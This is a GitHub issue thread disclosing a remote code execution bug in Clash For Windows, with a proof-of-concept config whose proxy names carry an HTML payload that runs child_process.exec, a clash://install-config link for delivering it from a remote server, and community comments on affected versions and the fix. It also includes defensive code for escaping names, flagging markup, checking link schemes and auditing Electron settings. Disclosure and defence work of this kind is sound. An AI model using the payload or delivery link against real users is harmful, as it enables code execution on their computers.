
[Bug]: Remote Code Execution/远程代码执行 #2710

Closed
Anthem-whisper opened this issue Feb 23, 2022 · 30 comments

@Anthem-whisper

Anthem-whisper commented Feb 23, 2022

Clash For Windows Remote Code Execution

Description

Clash For Windows is powered by Electron. If an XSS payload is in the name of a proxy, we can remotely execute arbitrary JavaScript code on the victim's computer.


Affected versions of clash_for_windows_pkg

version: 0.19.8 (there are other vulnerability triggers in version 0.19.9; it is exactly 0.19.9)

Platform: Windows

OS specifics: Windows 10

PoC

1. Import the following clash config file:

```yaml
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
```

2. Switch to it in "Profiles".

3. Click the "Proxies" column (sometimes this is not necessary).

Attention:

• You need to make sure that the payload is displayed in the Proxies column.
• The exploit is theoretically stable, but sometimes you may need to restart clash_for_windows_pkg and reproduce the vulnerability again.

A way to exploit

Put the malicious config file on the internet and use clash:// to install it; clash_for_windows_pkg will download it and switch to it automatically.

For example:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
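The chain the PoC above depends on, as an added example that is not code from the original post or from Clash For Windows: a proxy name interpolated into renderer markup unescaped, the escaped form, an import-time check that flags names containing markup, and a parser for clash://install-config links that refuses to fetch a profile over plain http. The function names, the config object (constructed to mirror the PoC YAML after parsing) and the https-only rule are assumptions for illustration; the app's real rendering code and link handler are not shown in the issue.

```javascript
// Added example, not code from Clash For Windows or the issue author.
// Assumptions: the renderer builds the Proxies list from the parsed YAML
// `proxies[].name` and `proxy-groups[].name` strings, and the clash:// handler
// hands the `url` parameter to a downloader. All names below are hypothetical.

// Escape the characters that let text break out of HTML text or attribute
// context (backtick included because some legacy browsers honoured it).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Vulnerable pattern: the untrusted name is interpolated straight into markup.
// In a renderer with nodeIntegration enabled, the onerror handler inside the
// PoC name can call require("child_process") with the app's privileges.
function renderProxyRowUnsafe(name) {
  return `<div class="proxy">${name}</div>`;
}

// Hardened: escape before interpolation. In a live DOM, prefer
// element.textContent = name, which cannot create tags at all.
function renderProxyRowSafe(name) {
  return `<div class="proxy">${escapeHtml(name)}</div>`;
}

// Import-time heuristic: flag any proxy or group name that looks like markup
// (a tag opener or an on*= handler). This is a tripwire for logging or warning
// the user, not a substitute for escaping at render time: "onion=..." would be
// a false positive and encoded payloads would be missed.
const MARKUP_RE = /<\s*\/?\s*[a-z!?]|\bon[a-z]+\s*=/i;

function findMarkupInNames(config) {
  const hits = [];
  for (const p of config.proxies || []) {
    if (MARKUP_RE.test(p.name)) hits.push(["proxies", p.name]);
  }
  for (const g of config["proxy-groups"] || []) {
    if (MARKUP_RE.test(g.name)) hits.push(["proxy-groups", g.name]);
    for (const ref of g.proxies || []) {
      if (MARKUP_RE.test(ref)) hits.push(["proxy-groups.proxies", ref]);
    }
  }
  return hits;
}

// clash://install-config?url=...&name=... handling: parse the link and refuse
// to fetch the profile unless the remote URL uses an allowed scheme (https
// only by default, an assumption; the PoC link uses plain http). A real
// handler should additionally ask the user before switching profiles.
function parseInstallConfigLink(link, allowedSchemes = ["https:"]) {
  const u = new URL(link);
  if (u.protocol !== "clash:" || u.hostname !== "install-config") {
    throw new Error("not an install-config link");
  }
  const raw = u.searchParams.get("url"); // searchParams already percent-decodes
  if (!raw) throw new Error("missing url parameter");
  const remote = new URL(raw);
  if (!allowedSchemes.includes(remote.protocol)) {
    throw new Error(`refusing to fetch profile over ${remote.protocol}`);
  }
  return { url: remote.href, name: u.searchParams.get("name") || "" };
}

// Constructed input mirroring the PoC YAML after parsing (not real data).
const POC_NAME = 'a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>';
const POC_CONFIG = {
  proxies: [
    { name: POC_NAME, type: "socks5", server: "127.0.0.1", port: "17938" },
    { name: "abc", type: "socks5", server: "127.0.0.1", port: "8088" },
  ],
  "proxy-groups": [
    { name: POC_NAME.slice(1), type: "select", proxies: [POC_NAME] },
  ],
};
const POC_LINK = "clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE";

console.log("unsafe:", renderProxyRowUnsafe(POC_NAME));
console.log("safe:  ", renderProxyRowSafe(POC_NAME));
console.log("flagged:", findMarkupInNames(POC_CONFIG).map(([where]) => where));
try {
  parseInstallConfigLink(POC_LINK);
} catch (e) {
  console.log("install-config rejected:", e.message);
}
```

Escaping at the render site is the fix that closes the bug; the import-time scan and the scheme check only reduce how easily a hostile profile reaches that site, which matters because the issue's delivery path is a one-click clash:// link to an attacker-hosted file.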
@Anthem-whisper
Author

Anthem-whisper commented Feb 23, 2022

I have sent an email with the PoC to the author's iCloud mailbox.

@Fndroid
Owner

Fndroid commented Feb 24, 2022

Thank you very much; it will be fixed in the next version.

@Fndroid
Owner

Fndroid commented Feb 25, 2022

Fixed or implemented in the latest release; check it out at https://github.com/Fndroid/clash_for_windows_pkg/releases

@Anthem-whisper
Author

Okay, I'll make it public now.

@DragonQuestHero

@Anthem-whisper Are versions below 0.19.8 affected?

@Pain4ever

Trash that writes Electron code without enabling the sandbox (doge)

@yi-Xu-0100
Contributor

yi-Xu-0100 commented Feb 25, 2022

Only 0.19.8 should be affected; that is the version it was introduced in.
Re-verified: 0.19.5 can also reproduce launching the calculator.

@peanut996

peanut996 commented Feb 25, 2022

Spectating 👀

@DragonQuestHero

Nonsense, the older versions are all affected too. Airports (subscription providers) turn straight into chicken farms (bot farms), indiscriminate kills. I'm off to scan for malware...

@54208039

Just here to watch.

@kjcxmx

kjcxmx commented Feb 25, 2022

right

@Fndroid
Owner

Fndroid commented Feb 25, 2022

> Trash that writes Electron code without enabling the sandbox (doge)

In your view, does this XSS have anything to do with whether the sandbox is enabled? Not enabling the sandbox makes it garbage, is that it?

@kotori2

kotori2 commented Feb 25, 2022

> Trash that writes Electron code without enabling the sandbox (doge)

> In your view, does this XSS have anything to do with whether the sandbox is enabled? Not enabling the sandbox makes it garbage, is that it?

https://www.electronjs.org/zh/docs/latest/tutorial/sandbox

> ...Therefore, we recommend enabling renderer sandboxing in the vast majority of cases, and being very careful otherwise.
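The point at issue in the exchange above, as an added example that is not code from Clash For Windows: the XSS itself does not depend on the sandbox, but whether an injected `<img onerror=...>` can reach `require("child_process")` does, because that needs Node APIs inside the renderer. The weak and hardened `webPreferences` objects below use real Electron `BrowserWindow` option names; the audit function and the default values it assumes (Electron's defaults differ across major versions, so they are passed in rather than hard-coded) are hypothetical.

```javascript
// Added example, not Clash For Windows code. The option names are Electron's
// BrowserWindow webPreferences keys; everything else is illustrative.

// Weak: renderer scripts can require() Node modules directly, so any HTML
// injection in the window (such as a proxy name rendered unescaped) is code
// execution with the app's privileges.
const weakWebPreferences = {
  nodeIntegration: true,
  contextIsolation: false,
  sandbox: false,
};

// Hardened: the renderer is an ordinary sandboxed web page. Privileged
// operations are exposed one at a time from a preload script through
// contextBridge, so an injection is confined to whatever that bridge allows.
const hardenedWebPreferences = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  // preload: path.join(__dirname, "preload.js"), // expose a narrow API only
};

// Assumed defaults for keys the app leaves unset. Electron has changed these
// across major versions, so callers should pass the defaults of the version
// they actually ship rather than trust these values.
const ASSUMED_DEFAULTS = { nodeIntegration: false, contextIsolation: true, sandbox: false };

// Returns one finding per setting that lets renderer XSS escalate or that
// weakens the browser-side protections; an empty list means none were found.
function auditWebPreferences(prefs, defaults = ASSUMED_DEFAULTS) {
  const v = { ...defaults, ...prefs };
  const findings = [];
  if (v.nodeIntegration) {
    findings.push("nodeIntegration on: renderer XSS can require() child_process, fs, ...");
  }
  if (!v.contextIsolation) {
    findings.push("contextIsolation off: page scripts share a JS world with the preload script");
  }
  if (!v.sandbox) {
    findings.push("sandbox off: a compromised renderer is not confined by the OS sandbox");
  }
  if (v.webSecurity === false) {
    findings.push("webSecurity off: same-origin policy disabled in the renderer");
  }
  if (v.allowRunningInsecureContent) {
    findings.push("allowRunningInsecureContent on: https pages may load http scripts");
  }
  if (v.enableRemoteModule) {
    findings.push("enableRemoteModule on: the remote module hands the renderer main-process objects");
  }
  return findings;
}

for (const [label, prefs] of [["weak", weakWebPreferences], ["hardened", hardenedWebPreferences]]) {
  console.log(label, auditWebPreferences(prefs));
}
```

With the hardened settings the PoC's `onerror` would still fire in the page, but `require` would be undefined there and the handler would throw instead of spawning `calc.exe`; output escaping is still needed so that the name cannot tamper with the UI or call whatever the preload bridge exposes.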

@LztCode

LztCode commented Feb 25, 2022

Tested 0.14 and 0.18; both are affected. Is there any forced-update mechanism?

@3wh1te

3wh1te commented Feb 25, 2022

> 3. Click the "Proxies" column (sometimes this is not necessary).

0.18.8 can also reproduce it.

@wjl110

wjl110 commented Feb 25, 2022

Thanks, OP.

@751897386

0.19.2 works too (

@GrayXu

GrayXu commented Feb 25, 2022

I hope a statement of the affected scope (version range?) can be published.

@Anthem-whisper
Author

> I hope a statement of the affected scope (version range?) can be published.

Didn't the PoC already say it? Everything at or below 0.19.8 is affected.
Other platforms weren't tested because I don't have the devices.

@ccint3cc

Updated to 0.19.10; tested and not affected.

@ccint3cc

0.19.8: PoC test succeeded.

@GrayXu

GrayXu commented Feb 25, 2022

> I hope a statement of the affected scope (version range?) can be published.

> Didn't the PoC already say it? Everything at or below 0.19.8 is affected. Other platforms weren't tested because I don't have the devices.

Thanks.

@Anthem-whisper
Author

> I hope a statement of the affected scope (version range?) can be published.

> Didn't the PoC already say it? Everything at or below 0.19.8 is affected. Other platforms weren't tested because I don't have the devices.

> Thanks.

A correction: version 0.19.9 did not fully fix it; please update to 0.19.10.

@crazyMarky

Thanks, upgraded to the latest version.

@yu-steven

Present at the scene, hugs.

@ahackingboy

Good thing my threat intel work is on point.

@malviez

malviez commented Mar 3, 2022

Thanks, upgraded to the latest version, hugs.

@ajfg93

ajfg93 commented Mar 7, 2022

Still using version 0.11.3 :)

@KonDream

KonDream commented Mar 7, 2022

0.19.11

@cxwx

cxwx commented Aug 14, 2022

So subscriptions like this are really unreliable; the underlying problem has not been solved.
